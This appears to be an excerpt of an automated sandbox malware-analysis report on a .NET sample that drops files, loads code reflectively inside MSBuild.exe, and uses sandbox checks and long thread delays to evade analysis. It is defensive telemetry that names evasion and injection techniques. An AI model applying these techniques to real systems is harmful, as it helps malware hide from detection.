                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: x7myVfh5YS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: x7myVfh5YS.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                  Source: x7myVfh5YS.exeStatic file information: File size 1403392 > 1048576
                  Source: x7myVfh5YS.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x152200
                  Source: x7myVfh5YS.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: costura.dotnetzip.pdb.compressed source: MSBuild.exe, 00000003.00000002.2332154673.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: $jq costura.dotnetzip.pdb.compressedlBjq source: MSBuild.exe, 00000003.00000002.2332154673.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: $jq costura.dotnetzip.pdb.compressed source: MSBuild.exe, 00000003.00000002.2332154673.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdbSHA256}Lq source: MSBuild.exe, 00000003.00000002.2352938527.0000000005A40000.00000004.08000000.00040000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2335934062.0000000003E95000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: C:\projects\dotnetzip-semverd\src\Zip\obj\Release\DotNetZip.pdb source: MSBuild.exe, 00000003.00000002.2357846379.00000000068C0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdb source: MSBuild.exe, 00000003.00000002.2352938527.0000000005A40000.00000004.08000000.00040000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2335934062.0000000003E95000.00000004.00000800.00020000.00000000.sdmp

                  Data Obfuscation

                  Source: 3.2.MSBuild.exe.53f0000.1.raw.unpack, GaM8BJiPLPU7o8wNO7B.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  Source: 3.2.MSBuild.exe.6440000.5.raw.unpack, cLxg1VivqXKPVdAKiHb.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  Source: 0.2.x7myVfh5YS.exe.6cefb000.2.raw.unpack, Program.cs.Net Code: Main System.AppDomain.Load(byte[])
                  Source: 3.2.MSBuild.exe.53f0000.1.raw.unpack, AssemblyLoader.cs.Net Code: ReadFromEmbeddedResources System.Reflection.Assembly.Load(byte[])
                  Source: 3.2.MSBuild.exe.53f0000.1.raw.unpack, M7WPwaNpU0F6D4wMaq.cs.Net Code: abhI2JMR24Sf6NFiMKv System.Reflection.Assembly.Load(byte[])
                  Source: 3.2.MSBuild.exe.5a40000.3.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                  Source: 3.2.MSBuild.exe.5a40000.3.raw.unpack, ListDecorator.cs.Net Code: Read
                  Source: 3.2.MSBuild.exe.5a40000.3.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                  Source: 3.2.MSBuild.exe.5a40000.3.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                  Source: 3.2.MSBuild.exe.5a40000.3.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                  Source: 3.2.MSBuild.exe.6440000.5.raw.unpack, BvK8wPBQakvfJfnIbN.cs.Net Code: OUtql2FQC4 System.Reflection.Assembly.Load(byte[])
                  Source: Yara matchFile source: 3.2.MSBuild.exe.5c60000.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.MSBuild.exe.59a0000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000002.2353903041.0000000005C60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.2352224373.00000000059A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.2332154673.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 4256, type: MEMORYSTR
                  Source: d3d9.dll.0.drStatic PE information: section name: .zKW
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exeCode function: 0_2_6CEF3C24 push ecx; ret 0_2_6CEF3C37
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_02AE42B8 push ebx; ret 3_2_02AE42DA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_058F0DC8 push eax; retf 3_2_058F0DD1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_05AAEBE7 push ecx; retf 3_2_05AAEBFE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_05ACDE4C push ebp; iretd 3_2_05ACDE4D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_05AC3880 push eax; ret 3_2_05AC388A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_05AC3860 push eax; ret 3_2_05AC386A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_05AC3870 push eax; ret 3_2_05AC387A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_05AC3849 push eax; ret 3_2_05AC384A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_05AC3850 push eax; ret 3_2_05AC385A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_05D91536 push esi; iretd 3_2_05D91537
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_06512409 push es; retf 3_2_06512440
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_065122FA push es; ret 3_2_06512300
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_06512385 push es; iretd 3_2_06512388
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_065141F7 push edi; retn 000Fh3_2_065141F9
                  Source: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exeCode function: 5_2_6C4C2394 push ecx; ret 5_2_6C4C23A7
                  Source: x7myVfh5YS.exeStatic PE information: section name: .text entropy: 7.61458092589058
                  Source: d3d9.dll.0.drStatic PE information: section name: .text entropy: 6.831697706181067
                  Source: Qqgmpuehc.exe.3.drStatic PE information: section name: .text entropy: 7.1190227316889745
                  Source: 3.2.MSBuild.exe.6440000.5.raw.unpack, qweCvpqeoUr8cKH2XNm.csHigh entropy of concatenated method names: 'IhbqUwoVHD', 'YgO0xmvB33tAr3oxLHT', 'bdQEjZvLlbbgsBL46Iy', 'Q1jauOv9nWJWb6OpFaP', 'nVbtZsvEqp1OKu7H4XX', 'O6UpefvNJCIarRdkNfp'
                  Source: 3.2.MSBuild.exe.6440000.5.raw.unpack, Y6eVC24FQ8H9gXRSZrT.csHigh entropy of concatenated method names: 'nvc4rsFRKL', 'HYqqif8VFHW7pJrpKCk', 'tuqhaI8PVdl2Tp3PTAa', 'H549e78jwTcjhtE1xd3', 'XgE1x98I5MwKQeHup3Z', 'jqXbHd8M7QUoyB2rgKY'
                  Source: 3.2.MSBuild.exe.6440000.5.raw.unpack, GADkTJGjt66Zhh45eWP.csHigh entropy of concatenated method names: 'vhYGMaoZlQ', 'DCjGdVI5Ou', 'CDeGuqTbTc', 'LsdGeaKurB', 'gvRGh3utUS', 'uf5GUReBLu', 'e5UGx63nGa', 'ia0GtkAfL6', 'mcyGJqOQFy', 'oBeGW3k25q'
                  Source: 3.2.MSBuild.exe.6440000.5.raw.unpack, lsLDSyAHWOyIGYCoPFq.csHigh entropy of concatenated method names: 'Mi1AVIkNUd', 'Cn4APaFTI5', 'IbEAjZRtid', 'Sj0AIIcF6m', 'W80AMsZy7P', 'SohAd3X2NR', 'DBtAuIHTRd', 'MRgtBYoFTWyoZcwpJbv', 'aYbZwJovwV99W5Jp7Xk', 'AAnWt6orjFoOvdE76sK'
                  Source: 3.2.MSBuild.exe.6440000.5.raw.unpack, dHooNxRvjakWUVogZLS.csHigh entropy of concatenated method names: 'VFaRoK7FOQ', 'a9GRpELIJ7', 'sRUrMWjoKq5LXS12hdj', 'i6GNZRjpYr1uhriVWJx', 'CO6RI6jQ7NTYtB4RRqI', 'n84FpNjvxa4XHurbLIc', 'PnyAnsjr4juUyJhhNTP', 'pxsLT0j8glPdfa3EeCE'
                  Source: 3.2.MSBuild.exe.6440000.5.raw.unpack, gQEQoo2VcsIuCsZJLev.csHigh entropy of concatenated method names: 'PjK2jQmhWI', 'vvr2IwBejI', 'CMK2MaSywn', 'XZN2doM9bc', 'svC2u3T3ds', 'r8X2eixIVy', 'hb42hIvCCO', 'ddo2UQisur', 'rU22xhdFkl', 'aSJ2ty6ZCQ'
                  Source: 3.2.MSBuild.exe.6440000.5.raw.unpack, sG4wt3YlZNNtpsfVAHe.csHigh entropy of concatenated method names: 'wTsYayCV7O', 'dPlYkYtZwb', 'S2EY23V3Zw', 'kRgYKAa4K5', 'zSCY4eUUMc', 'apW4E0P01TCE10leSTd', 'e7tOeNP3WgHvQ6cIQC4', 'sw1Y5pN8dE', 'GL1YAqxEOM', 'NJvYGkVPwM'
                  Source: 3.2.MSBuild.exe.6440000.5.raw.unpack, RQaSWVOoOVrpvJ7k2mi.csHigh entropy of concatenated method names: 'oEoOQGnUGx', 'JZpO8e2Zc2', 'NsCOSNgHBr', 'a78OHgXYGZ', 'tTROD1NmCe', 'z60OVAsa8D', 'EGJj4rSd88ge2fwqxeN', 'ebwo1WSuD2Es4xAkS3o', 'uH9Bs5Se4PdZ5rHy5Bv', 'oeksrDShdoLlqmqaalr'
                  Source: 3.2.MSBuild.exe.6440000.5.raw.unpack, BvK8wPBQakvfJfnIbN.csHigh entropy of concatenated method names: 'F11NuHd5K', 'uSenOUUWP', 'C9DCxVlsp', 'Qq47TaSfr', 'Vq9fsKi2q', 'skwzYHmMj', 'OUtql2FQC4', 'jLjqqiHC5t', 'Nqyq5jxaxX', 'Y9KURtvZcSB4OPWRhtp'
                  Source: 3.2.MSBuild.exe.6440000.5.raw.unpack, brNUMWZI1ElyPmCgnRu.csHigh entropy of concatenated method names: 'i1GZdH0Avl', 'dqnC2bDfGtBT4BE99uu', 'YcJJ7eDzTcAw8h9LEdZ', 'JjZjU5VldrRIBMSuhCo', 'PZ01fOVqkafjy3O2wlv', 'HBk1lHV5t8YNkFfiKKk', 'TGxnAVVA4S5GyGBbThG'
                  Source: 3.2.MSBuild.exe.6440000.5.raw.unpack, IrLmSMG0fWWgKF2TQDw.csHigh entropy of concatenated method names: 'opRGs3jyJv', 'iDAqBhplRSoH1TYDnLj', 'bJrh4spqk8AnstK7WcS', 'svcdcqof1Bo7kSJUK0M', 'es1ZYmozgwgiZJ1w3eb', 'j7QIOgp5lFpNwXXkVvn'
                  Source: 3.2.MSBuild.exe.6440000.5.raw.unpack, RnY12TA5klXPLyiySWo.csHigh entropy of concatenated method names: 'beqAGma09m', 'eZ7OHJrUQ9CjlHskXuA', 'AOHyn8rxiuTc1VL3V6B', 'uk5ICRrtpO1ggnvZBQJ', 'hqFfMZrJ5cywgZNg8nu', 'd1d0JlrWMyAfNcLOntG'
                  Source: 3.2.MSBuild.exe.6440000.5.raw.unpack, wpDAL1bFuWcemcdRqgf.csHigh entropy of concatenated method names: 'Dispose', 'i9sQ4xPLcpWsW1xeLRR', 'fRcMgkP9iaql0yVLpAA', 'hi0vKPPJqVtCrakcvFA', 'ktf2FjPWyNYn5gD3Znv', 'aAEqCjPBDkEnComCrNU', 'Fcr5rvP750hR2NqcMIu', 'K440g9Pf89ixy2w0RxY', 'XjsoV6jlQSq2cX13C14', 'bp5wpljqVN9ML7GMRAb'
                  Source: 3.2.MSBuild.exe.6440000.5.raw.unpack, uycrb3qxQqQjSqdftZo.csHigh entropy of concatenated method names: 'XvHqNM8i4m', 'xkoskJrAuc4kQLMGMVj', 'qtn4sNrGS1gLLhIx9dm', 'bgrGX5rXHYrZB96kHEG', 'wmBqCda7RA', 'uqwq7y98uN', 'G0f6YgrkCiugKys1GG4', 'QvWUEpr2cg1jZ5Xr2wf', 'BFCfCsrK3L0NB4JXkoG', 'jnS5qmcacK'
                  Source: 3.2.MSBuild.exe.6440000.5.raw.unpack, EjD3KIZhYgXxF43EgY5.csHigh entropy of concatenated method names: 'qEbZnAs6M4', 'GvKZCIodE8', 'ExcZ7EQK3l', 'mHJZf8yhkC', 'ctxZztLcjd', 'daPclw0mhE', 'pBHcqNFDfp', 'njbc5mJeQq', 'WWjcAgsXxA', 'jAycG17NjV'
                  Source: 3.2.MSBuild.exe.6440000.5.raw.unpack, cLxg1VivqXKPVdAKiHb.csHigh entropy of concatenated method names: 'imhGt1I1Im3ufkwam41', 'PlTJGYIFh6TVNxujhVr', 'nLE1lFTMhl', 'BsqWOhIpECspVDi6fCq', 'OBfv2cIQtBukdT01ZJv', 'aukMsnI8EdPArDyUrvM', 'eMrp0sISmRmTMgBsk7y', 'g38PJ8K3c0', 'MAI1kVyT98', 'tir12s4ZQk'
                  Source: 3.2.MSBuild.exe.6440000.5.raw.unpack, qXwNvgTDO5S0rFRG02E.csHigh entropy of concatenated method names: 'k5MTPTwBYj', 'trmTjIt6bc', 'AGEYk1H5N0i5J63YLqk', 'qumGAWHALTl1Mxp8nvB', 'FsoKxMHGg9OFwmdSFZ9', 'IatPhFHXwcyKWv9NbQV'
                  Source: 3.2.MSBuild.exe.6440000.5.raw.unpack, w5VySpAKsAdWEyeyh1L.csHigh entropy of concatenated method names: 'vrcAgrkF6Y', 'DdH7oroAx4Ppccson9c', 'W2KNUQoGHhDJSw0KUJi', 'Ne3LyQoXnxIgvZ99OUN', 'BeyAOeJyrt', 'ABxATHyJRj', 'xqGA0krbeu', 'SaeA3l4aub', 'dTxAsIYxYy', 'h4vAZjAJma'
                  Source: 3.2.MSBuild.exe.6440000.5.raw.unpack, TkyIPcTNhQ8Ovm9sZYS.csHigh entropy of concatenated method names: 'Dispose', 'y9YgafHQpjmGKFNspOe', 'rFiEGxHo4W1nhuEmSKM', 'WbvFqeHphbXrEhLNFjq', 'Paf2rfH81MWd0rpiu2m', 'I4MWZcHSGJqpw4VopnR', 'l6bXxBHjILZdecy1MRE', 'IqjBObHIU0jeo61ejhY', 'uVFwmIHdLT8Q2hEDn2l', 'n4BRSGHukFJU70Jl5Ph'
                  Source: 3.2.MSBuild.exe.6440000.5.raw.unpack, EyUmHpZDAWAhWQsv4H.csHigh entropy of concatenated method names: 'kTTYgxC8A', 'hIxwQiU4H', 'p1ubTB1J5', 'aFXRLhwMe', 'i1YymCTq4', 'acqmXkc9w', 'tyygjXBgU', 'PWDiBxGL4', 'MisQgdFL5SrD4rj9naF', 'snv6vqF92g7BFBUM994'
                  Source: 3.2.MSBuild.exe.6440000.5.raw.unpack, bydUEn1gUAnWL8Sm347.csHigh entropy of concatenated method names: 'oNX1HjqGxN', 'AYT1DJ7UPw', 'YMX1VstA8C', 'gBK1PBi2rO', 'rIQ1jGPqD2', 'vlq1I91W2f', 'gco1MENaQu', 'nyc1d7U8sY', 'ELc1uYyGYB', 'YvC1ePxDVd'
                  Source: 3.2.MSBuild.exe.6440000.5.raw.unpack, ixlaSY2QcGIF0ZrQ9oo.csHigh entropy of concatenated method names: 'JaZ2SO2X7e', 'WAH4FmQ9joH5YHsHG7j', 'B8QnH2QBjbAoAjWMuvZ', 'w07JPvQELkVWdYsBoAv', 'm9kGYWQNkEuHC1SB86v', 'B1jMFcQnh6KA3va8YTx', 'R2N8iqQCssag00ptMpB', 'pW7Z4CQ7j6ILKNdcxji', 'PSLlQ3QfJP7EICD4dhK', 'Wohc4rQzH0OaPEfc2qh'
                  Source: 3.2.MSBuild.exe.6440000.5.raw.unpack, WlMuBdkKbKfnmwLWtGp.csHigh entropy of concatenated method names: 'me1k12vXlD', 'NyBkFaulHD', 'SFDkvrRDRh', 'yPmkr33ZVp', 'mYckoq9URi', 'OaTkpZvcAj', 'c3tkQA5Z2D', 'n7rm1AQq83T7ss7mQYp', 'fLy9ctQ5F0ouCqWBvw3', 'xZAkOUFnA0'
                  Source: 3.2.MSBuild.exe.6440000.5.raw.unpack, jUitfU32YZ4hZJ2eSoH.csHigh entropy of concatenated method names: 'NyqYwND3lVsYr1ku6Jf', 'EOxSXkDTlWomfSjLLyH', 'vpsi7WD0npQ7kgL9ZY9', 'xNP3b6undG', 'blgna1DZY8oX1kt9YAR', 'fuRI3dDctJUsIyacGdw', 'KRc3gNchLj', 'd6cn9DDwJ6jN1ahg4nN', 'IwLYktDbSOvQmRfuP09', 'utxMWADRAf3NeZD23CO'
                  Source: 3.2.MSBuild.exe.6440000.5.raw.unpack, IBj3d7ZpmxOtqvjDy0U.csHigh entropy of concatenated method names: 'OPuZ8hvP8C', 'qAMZSXaPH7', 'cmgZHvrxis', 'sQcZDccxrV', 'aAOZV924k8', 'niEcnPDLFoYJUZXmZso', 'gbI44LD9Tj3ycnZABaH', 'sFer3nDBefsvHbAv7g2', 'vuSW3ZDEJsrpaLXyr7c', 'wWCXpTDNsR1y1Utn1cs'
                  Source: 3.2.MSBuild.exe.6440000.5.raw.unpack, YJAGZ7icGnV2a4pdkrT.csHigh entropy of concatenated method names: 'TeyiwiH278', 'Xh0ibgLdmI', 'voSiR1XnEu', 'Rhtiy2wAIx', 'i2Kimce972', 't3OFepIXEm1CLjZofvn', 'yOab3jIaZnLuGdpUIJe', 'ebAkkQIk2goJ00IEAv5', 'aSEF3wI2Bcsi6UiDwrf', 'nhbGxnIKQ8xpn1cCxmQ'
                  Source: 3.2.MSBuild.exe.6440000.5.raw.unpack, p2HRsp3Q0I4hnP6bNEB.csHigh entropy of concatenated method names: 'ifm3SANe8l', 'YVd3Hl8yrl', 'M2B3DQ82pX', 'K2orncDofFyK7VBiahG', 'jZaVOKDvkTunX7h5ATK', 'qgh8bDDrI2MCYGrbiZP', 'MvowXDDpkrnp48uws3F', 'DIoCS0DQHopsrKnPt7Y', 'snt9wZD8cAPxqsh4YWa'
                  Source: 3.2.MSBuild.exe.6440000.5.raw.unpack, vwocD72mPkO9LGGkJbE.csHigh entropy of concatenated method names: 'F3Z21O50Sg', 'FcFWKBQutD8RLLVMWxm', 'BvCB46Qe6DjYxoMpT5H', 'KRNgELQhVThLQRkxZNG', 'UqphZiQUHIp4dmUrgex', 'nuGoWJQx9q29reswBlS', 'SUS2iW3sqK', 'MVx9dCQPUC31sYpl6LZ', 'cfq1jmQjnMXJBxOyhB2', 'uti2l7QIOKWqRmJ7c0H'
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exe
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exe File created: C:\Users\user\AppData\Roaming\d3d9.dll
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exe Process information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 4256, type: MEMORYSTR
                  Source: MSBuild.exe, 00000003.00000002.2332154673.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL0SELECT * FROM WIN32_BIOS8UNEXPECTED WMI QUERY FAILURE
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exe Memory allocated: 13F0000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exe Memory allocated: 2E10000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exe Memory allocated: 4E10000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exe Memory allocated: 54B0000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exe Memory allocated: 64B0000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exe Memory allocated: 65E0000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exe Memory allocated: 75E0000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 12A0000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 2CB0000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 2AC0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exe Memory allocated: 1490000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exe Memory allocated: 3230000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exe Memory allocated: 3140000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exe Memory allocated: 5770000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exe Memory allocated: 6770000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exe Memory allocated: 68A0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exe Memory allocated: 78A0000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 2DE0000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 2EB0000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 2DE0000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599886Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599777Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599667Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599559Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599437Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599327Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599203Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599094Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598984Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598859Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598750Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598640Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598520Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598390Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598279Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598156Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598047Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597937Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597828Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597718Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597604Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597442Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597312Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597199Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597092Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596980Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596857Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596703Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596515Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596375Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 5057Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 4759Jump to behavior
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\d3d9.dllJump to dropped file
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exeAPI coverage: 8.6 %
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exe TID: 6620Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 892Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4816Thread sleep time: -18446744073709540s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4816Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4816Thread sleep time: -599886s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4816Thread sleep time: -599777s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4816Thread sleep time: -599667s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4816Thread sleep time: -599559s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4816Thread sleep time: -599437s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4816Thread sleep time: -599327s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4816Thread sleep time: -599203s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4816Thread sleep time: -599094s >= -30000sJump to behavior
